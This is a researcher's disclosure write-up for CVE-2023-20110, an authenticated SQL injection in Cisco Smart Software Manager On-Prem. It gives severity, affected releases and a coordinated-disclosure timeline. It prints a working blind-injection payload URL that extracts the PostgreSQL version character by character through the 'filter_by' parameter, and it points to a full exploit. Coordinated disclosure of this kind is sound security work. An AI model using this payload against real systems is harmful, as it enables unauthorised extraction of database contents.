CVE-2023-20110
Authenticated SQL Injection in 'filter_by' parameter
6.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Cisco Smart Software Manager On-Prem
=< Release 8-202212
Jakub Brzozowski (redfr0g)
A vulnerability in the web-based management interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system.
To present the full impact of this vulnerability, a Proof of Concept exploit was created. The following exploit aims to exfiltrate results of version() function executed against PostgreSQL DBMS system running on the backend. Using division by zero error, the exploit exfiltrates DBMS banner one character at a time.
Payload used:
https://<SSM-IP>:8443/backend/notifications/search_account_notifications.json?filter_by=message_type))%20LIKE%20%27%25%27+OR+1+%3d+ 1/+(SELECT+CASE+WHEN+(select+version()+LIKE+'P%25')+THEN+0+ELSE+1+END)--%20&filter_val=a&offset=0&limit=10You can find full exploit here: https://github.com/redfr0g/CVE-2023-20110
- 23-01-2023 - vulnerability reported to Cisco PSIRT
- 23-01-2023 - first response from Cisco
- 07-02-2023 - successful reproduction of the vulerability by Cisco and identification of the root cause of the bug
- 10-05-2023 - CVE-2023-20110 is assigned to the vulnerability
- 18-05-2023 - security advisory is published by Cisco
- 19-05-2023 - approved to make vulnerability disclosure by Cisco
- 17-07-2023 - vulnerability writeup on brzozowski.io